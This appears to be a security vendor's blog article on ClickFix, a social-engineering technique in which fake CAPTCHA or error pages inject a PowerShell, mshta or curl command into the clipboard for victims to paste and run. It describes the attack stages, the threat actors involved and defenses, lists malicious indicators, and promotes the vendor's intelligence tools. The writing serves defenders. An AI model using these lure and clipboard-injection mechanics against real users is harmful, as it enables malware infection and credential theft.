ClickFix

ClickFix Malware and the Rise of User-Assisted Cyber Attacks

Key Takeaways

• ClickFix is a social engineering technique that exploits human behavior rather than software vulnerabilities, tricking users into executing malicious commands themselves.

• It bypasses most conventional security controls. Because the attack produces no malicious file on disk in its initial stage and uses legitimate Windows utilities (LOLBins) for execution, static antivirus, email filters, and many EDR solutions do not detect it. Phishing-resistant MFA offers no protection either, since ClickFix targets the endpoint, not credentials.

• Growth has been explosive. From its identification in late 2023, ClickFix attacks grew by over 500% in the first half of 2025 alone, making it the second most common attack vector globally and reflecting both its effectiveness and the low barrier to adoption by new threat actors.

• Nation-state APT groups have adopted it. Within a 90-day window between October 2024 and January 2025, confirmed nation-state groups including Russia's APT28, North Korea's Kimsuky, and Iran's MuddyWater all incorporated ClickFix into their espionage operations — replacing traditional infection stages with this user-driven approach.

• The payload spectrum is severe. ClickFix delivers infostealers (Lumma Stealer, Danabot, StealC), ransomware, remote access trojans (Quasar RAT, Latrodectus, NetSupport RAT), keyloggers, cryptominers, and custom nation-state implants. A single campaign may deploy multiple malware families simultaneously.

• The technique is evolving and expanding. ClickFix has expanded from Windows-only to macOS targets, spawned variants like FileFix, and been commoditized through builder toolkits sold on criminal marketplaces. Supply chain amplification demonstrates its potential for large-scale impact from a single compromise.

• Proactive intelligence is the most effective defense layer. Because ClickFix campaigns spin up new infrastructure rapidly and are designed to evade reactive detection, staying ahead requires continuous, real-time threat intelligence.

ANY.RUN's Threat Intelligence Feeds deliver fresh, low-noise ClickFix IOCs directly into SIEM and firewall systems in STIX/MISP format — hours before they reach most other threat intel sources — giving security teams the early warning they need to block campaigns before they reach end users. Threat Intelligence Lookup enables instant contextual investigation of suspicious indicators across 30+ parameters with direct links to sandbox execution sessions:

domainName:"dntds.shop".

Malicious domain linked to ClickFix attacks

What is ClickFix?

ClickFix is a social engineering technique used to deliver malware by tricking users into performing actions that appear to “fix” a technical problem. It emerged prominently around late 2023–early 2024 and surged in popularity throughout 2025. Instead of relying solely on exploits or malicious downloads, attackers manipulate users into manually executing commands, disabling protections, or launching malware themselves.

ClickFix campaigns often imitate CAPTCHA checks, browser errors, VPN issues, software update prompts, or corporate authentication pages. The result is a highly convincing attack chain that transforms ordinary employees into unwitting participants in malware deployment.

For businesses, ClickFix represents a dangerous shift in attacker tactics. It combines realistic social engineering with malware delivery methods that evade traditional defenses, increasing the likelihood of credential theft, ransomware deployment, data exfiltration, and long-term compromise.

The typical ClickFix interaction unfolds like this: the user visits a web page (either a compromised legitimate site or a purpose-built fake) and encounters a pop-up mimicking a familiar interface. This could be a Cloudflare Turnstile CAPTCHA, a Windows error dialog, a browser update prompt, or a Microsoft security alert. The page instructs the user to press Windows + R (opening the Run dialog), then Ctrl + V (pasting clipboard contents), and finally Enter. The malicious payload (often a PowerShell command or a mshta.exe / curl.exe call) has already been silently injected into the clipboard by JavaScript running on the page. The user simply completes the sequence, believing they are verifying their identity or resolving a technical issue.

This approach is psychologically effective for several reasons. Internet users have been conditioned over years to interact with CAPTCHAs and security prompts with minimal scrutiny, they are routine friction, not warning signs. The instructions feel technical enough to seem legitimate. And the urgency engineered into the prompt discourages careful reading. The technique exploits what security researchers call "verification fatigue."

Crucially, because no file is written to disk in the initial stage and no traditional exploit is triggered, ClickFix frequently evades conventional security controls including static antivirus, email filters, and many endpoint detection and response (EDR) solutions. The malicious payload is fetched and executed entirely in memory using legitimate Windows utilities — so-called Living-Off-the-Land Binaries (LOLBins) such as msbuild.exe, regasm.exe, certutil.exe, and powershell.exe.

Threat Intelligence Lookup allows to select sandbox sessions with ClickFix attacks detonated in real time, with the Sandbox performing interactions required from the user. Leverage search parameters to find specific attacks, for example, delivering a certain malware family:

threatName:"clickfix" AND threatName:"AsyncRAT".

ClickFix attack samples in Interactive Sandbox

View sandbox analysis

ClickFix attack analysis in Interactive Sandbox

How ClickFix Threatens Businesses and Organizations

For organizations, ClickFix represents a qualitative shift in the threat environment. Traditional defenses are designed around detecting malicious files, suspicious network connections, and known exploit patterns. ClickFix sidesteps all three by making the human the attack surface.

Security controls are neutralized by design. Because the user executes the malicious command themselves, the action appears indistinguishable from a legitimate administrative task. Standard PowerShell execution logs may flag unusual scripts, but if users are executing commands copied from an attacker-controlled page, the initial trigger looks like voluntary user action. Phishing-resistant authentication mechanisms such as FIDO2 passkeys offer no protection, since ClickFix does not steal credentials, it compromises the endpoint directly.

The payloads are severe. ClickFix is not a one-trick technique; it serves as a delivery mechanism for a wide spectrum of threats. Organizations that fall victim may face credential-stealing infostealers, ransomware, remote access trojans (RATs) that provide persistent backdoor access, keyloggers, cryptominers, and post-exploitation frameworks. In some documented campaigns, a single ClickFix infection chain has been observed dropping multiple distinct malware families simultaneously.

The attack surface is broad. ClickFix can reach employees through phishing emails, malvertising on legitimate websites, poisoned search results, compromised supplier or partner websites, and even legitimate cloud platforms abused as staging infrastructure. Any device with a browser and internet access is a potential entry point, which means remote workers, contractors, and employees using personal devices for work tasks are all within scope.

Nation-state actors raise the stakes. When espionage-grade threat groups such as APT28, Kimsuky, and MuddyWater adopt a technique, it signals that it is mature, reliable, and difficult to counter with conventional defenses.

Unlike many traditional malware campaigns, ClickFix attacks frequently target employees directly through believable business workflows. This makes them particularly dangerous in modern environments where users routinely interact with cloud services, remote access tools, collaboration platforms, and browser-based applications.

Even mature organizations may struggle because:

• The malicious action is often user-initiated
• Commands may use legitimate system tools
• Payloads can be fileless or memory-resident
• Traditional phishing indicators may be absent
• Security awareness training may not fully cover this tactic

For SOC teams, ClickFix introduces additional detection challenges because the initial execution chain can appear similar to normal administrative behavior.

Victimology: Who Is Most Vulnerable?

ClickFix has demonstrated sector-agnostic reach, but some industries face concentrated exposure due to the nature of their data, their workforce behavior, and their position in threat actors' target lists.

Threatened sectors and industry-specific risks

The Evolution of ClickFix: From Fringe Technique to Dominant Attack Vector

ClickFix's rise has been remarkably rapid. Understanding its trajectory helps explain why it has become so deeply embedded in the threat landscape.

October 2023 – First observations. Security researchers record early instances of the technique in the wild, characterized by fake error dialogs instructing users to paste PowerShell commands.

March 2024 – Formal identification and naming. Proofpoint formally identifies and names the ClickFix technique after observing organized campaigns using it to deliver infostealers. The technique begins attracting broader research attention.

May 2024 – ClearFake integration. The ClearFake campaign, previously known for fake browser update lures on compromised WordPress sites, integrates ClickFix. Attackers deploy it alongside the EtherHiding technique using smart contracts on Binance's BNB Smart Chain to serve next-stage payloads, delivering Emmenhtal Loader and Lumma Stealer. This marks a significant escalation in technical sophistication.

August 2024 – SMOKESABER and reCAPTCHA lures. Group-IB documents a campaign using fake reCAPTCHA pages to deploy Lumma Stealer via a custom downloader they name SMOKESABER. ClickFix adoption accelerates sharply across multiple threat actor clusters.

October 2024 – APT28 adopts ClickFix. APT28 uses ClickFix in a phishing campaign mimicking a Google Spreadsheet. Victims who complete the fake reCAPTCHA step unknowingly establish an SSH tunnel and launch Metasploit, giving attackers backdoor access.

November 2024 – MuddyWater campaign targeting 39 organizations. TA450 (MuddyWater) sends phishing emails timed to coincide with Microsoft Patch Tuesday, impersonating security update alerts. At least 39 organizations — mostly in the Middle East — are targeted. Victims who follow the instructions install the legitimate remote management tool "Level," which is then abused for espionage and data exfiltration.

January–February 2025 – Kimsuky targets think tanks. North Korea's TA427 (Kimsuky) uses ClickFix in campaigns against think tanks focused on DPRK policy, spoofing Japanese diplomatic correspondence to reach targets in South Korea, Japan, and the United States.

March–April 2025 – Latrodectus campaigns via ClearFake. A new wave of Latrodectus malware delivery uses ClickFix with ClearFake infrastructure. The clipboard injection conceals the payload behind an innocuous-looking "Cloud Identificator: 2031" label, with the actual PowerShell command hidden in the clipboard data.

May 2025 – Attacks surge 517%. ESET's Threat Report documents a 517% increase in ClickFix attacks in the first half of 2025, making it the second most common attack vector globally, trailing only conventional phishing.

June–August 2025 – macOS expansion. Sophos and other researchers document ClickFix campaigns targeting macOS users with the MacSync infostealer, using User-Agent string detection to serve OS-specific lures. The technique is no longer a Windows-only concern.

2025–2026 – FileFix and builder commoditization. A variant called FileFix emerges, replacing the Windows Run dialog with a simulated Windows Explorer interface to lure users into executing malicious files. Meanwhile, threat actors begin selling ClickFix "builders" — ready-made toolkits for generating weaponized landing pages — lowering the technical barrier to entry further and ensuring continued proliferation.

How ClickFix Gets Into Systems and Spreads

Common Infection Vectors

• Phishing emails
• Malicious advertisements
• Fake software update pages
• Compromised websites
• Fraudulent cloud-sharing notifications
• SEO-poisoned search results
• Messaging platform abuse

After initial compromise, malware may spread through:

• Credential theft
• Remote desktop access
• Lateral movement tools
• Shared drives
• VPN compromise
• Cloud account takeover

Because ClickFix often serves as an initial access mechanism, the actual post-compromise behavior depends on the malware family deployed afterward.

How Does ClickFix Malware Function?

The ClickFix infection chain operates in several distinct stages, each designed to minimize technical detection while maximizing the likelihood of user compliance. Stage 1 — Lure delivery. The user arrives at a malicious page through one of the vectors described above. The page renders a convincing fake interface: a Cloudflare Turnstile CAPTCHA, a Windows security dialog, a browser update notification, or a Microsoft 365 verification prompt. Visual design closely mimics legitimate interfaces.

Stage 2 — Clipboard injection. When the user interacts with the fake CAPTCHA or error dialog (clicking a button, checking a box, etc.), JavaScript on the page silently executes document.execCommand('copy') or equivalent clipboard API calls, writing a malicious command to the system clipboard.

Stage 3 — User-executed command. The page then instructs the user to open the Windows Run dialog (Win + R), paste the clipboard contents (Ctrl + V), and press Enter. Some campaigns use alternative execution surfaces: the browser address bar, a terminal prompt, or a PowerShell window opened via other means. In macOS-targeted campaigns, the Terminal application is used instead.

Stage 4 — First-stage payload. The pasted command is typically a short PowerShell one-liner, mshta.exe call, or curl.exe command that fetches a second-stage script from attacker-controlled infrastructure. This command runs entirely in memory — no malicious file is written to disk at this stage. Common LOLBins used include certutil.exe, mshta.exe, bitsadmin.exe, and regsvr32.exe.

Stage 5 — Payload delivery and execution. The fetched second-stage script downloads and executes the final malware payload. Obfuscation techniques are employed throughout: base64 encoding, bloated JSON variables to evade static analysis, blockchain-based payload hosting (EtherHiding), and DLL sideloading for persistence. Malware may be injected into legitimate Windows processes such as explorer.exe or svchost.exe to blend with normal system activity.

Stage 6 — Post-compromise activity. The installed payload executes its primary mission: credential theft, keylogging, ransomware deployment, C2 beaconing for remote access, cryptocurrency mining, or data exfiltration. Infostealers typically harvest browser credentials, saved passwords, cryptocurrency wallet files, session cookies, and system information before transmitting via encrypted channels to command-and-control infrastructure.

A key technical strength of this chain is its minimal footprint during initial stages. The absence of file-based artifacts means traditional disk-scanning security tools have nothing to detect. By the time malware is resident on the system, it has often already established persistence through scheduled tasks, registry modifications, or injected processes.

ClickFix Sandbox Analysis

View this sandbox session to observe a typical ClickFix attack kill chain, payload, connections, and processes.

Fake “fix” provoking user to run PowerShell command

This is an example of a “fix-this” swindle persuading a user to run a command to complete a fake Windows update. If they follow the instructions, mshta.exe process is initiated (utilizing a somewhat unusual IP with a “0x” in it).

Malicious process with a suspicious IP address

It triggers a PowerShell command that drops an .exe file.

Malware delivered via PowerShell

It reads a specific registry key to check if the user is running a certain type of virtual machine and reads the BIOS version which belongs to yet another anti-analysis trick. Pay attention to the process OOBE-Maintenance.exe: looks like it has been injected since it’s a legitimate file, but it’s loading DLLs and demonstrates very suspicious activities including a check for a sandbox environment.

Malware gathers system information

So, we can classify this sample as malicious revealing info-stealer activity along with anti-analysis.

And here we see a malicious extension having been dropped. Google Chrome puts a lot of effort into making it hard for infostealers, but unfortunately infostealers worked around that.

Analyze suspicious files and downloads in the sandbox

How Businesses Can Use ANY.RUN’s Threat Intelligence Feeds and TI Lookup Against ClickFix

Modern ClickFix campaigns move quickly, rotate infrastructure aggressively, and frequently reuse indicators across multiple attacks. Rapid intelligence access is critical for proactive defense.

Using Threat Intelligence Feeds for Early Detection

ANY.RUN's Threat Intelligence Feeds provide a real-time stream of malicious indicators — IPs, domains, URLs — extracted from live sandbox analyses of the latest threats across thousands of organizations. For ClickFix defense, TI Feeds deliver several critical advantages:

• Early warning: IOCs from ClickFix campaigns are added to the feeds as soon as they emerge from sandbox investigations, frequently before they appear in other threat intelligence sources. This gives security teams a window to block infrastructure before it reaches their users.
• Low noise: Feeds are pre-filtered for confirmed malicious activity, reducing the false positive burden on Tier 1 analysts and allowing correlation rules to focus on high-confidence signals.
• Contextual enrichment: Every IOC in the feed is accompanied by a link to the sandbox session in which it was captured, providing full attack context — not just an IP address, but the complete attack chain that IP was observed supporting.
• SIEM and TIP integration: Delivered in STIX and MISP formats with full API support, TI Feeds integrate into existing SIEM and Threat Intelligence Platform infrastructure — including OpenCTI, ThreatQ, Splunk, and others — without custom development. Updates arrive every two hours, ensuring continuous coverage of evolving ClickFix infrastructure.

Using Threat Intelligence Lookup for Investigation and Hunting

ANY.RUN TI Lookup is a searchable threat intelligence portal drawing on data from millions of interactive sandbox sessions conducted by more than 600,000 security professionals. When a suspicious URL, domain, IP address, file hash, or PowerShell command pattern surfaces in an alert or incident, analysts can query TI Lookup across more than 40 parameters to immediately retrieve:

• Connected IOCs: Related domains, IPs, hashes, and command strings associated with the same campaign or threat actor cluster.
• Sandbox session links where the indicator was observed — showing the full attack chain in execution, including file drops, registry modifications, network connections, and process trees.
• Tactics and techniques* used in sessions involving the indicator, enabling faster triage and prioritization.

For ClickFix specifically, TI Lookup allows SOC analysts to investigate a suspicious domain or URL that appeared in a phishing report and instantly see whether it is associated with known ClickFix infrastructure, what malware families it has delivered, which campaigns it is linked to, and what other indicators share its fingerprint. This context transforms a single data point into an actionable intelligence picture within seconds.

destinationIP:"89.190.158.132".

ClickFix attack samples in Interactive Sandbox

Contextual data on a ClickFix-linked IP address:

• PowerShell monitoring and restriction policies
• User awareness training focused on fake troubleshooting prompts
• EDR behavioral analytics
• Multi-factor authentication
• Least privilege access
• Browser isolation where possible
• DNS filtering
• Command-line logging
• Network segmentation
• Rapid patch management
• Detection engineering for clipboard-based attacks

Security awareness programs should specifically teach employees that legitimate IT departments rarely instruct users to paste commands into PowerShell or Run dialogs manually.

Conclusion

ClickFix represents a modern evolution of malware delivery techniques that prioritizes psychological manipulation over technical exploitation. By exploiting user trust and leveraging legitimate system tools, attackers can bypass traditional security layers and establish footholds inside corporate environments with alarming efficiency.

For organizations, the danger extends far beyond a single infected endpoint. ClickFix campaigns can lead to credential theft, ransomware deployment, operational disruption, data exposure, and long-term compromise.

Defending against this threat requires a combination of:

• Continuous threat intelligence
• Strong endpoint visibility
• Behavioral detection
• User education
• Rapid incident response

As attackers continue refining social engineering techniques, proactive visibility into emerging infrastructure and malware behavior becomes increasingly important for reducing business risk.

Trial TI Lookup to start gathering actionable threat intelligence on the malware that threatens your business sector and region: just sign up to ANY.RUN.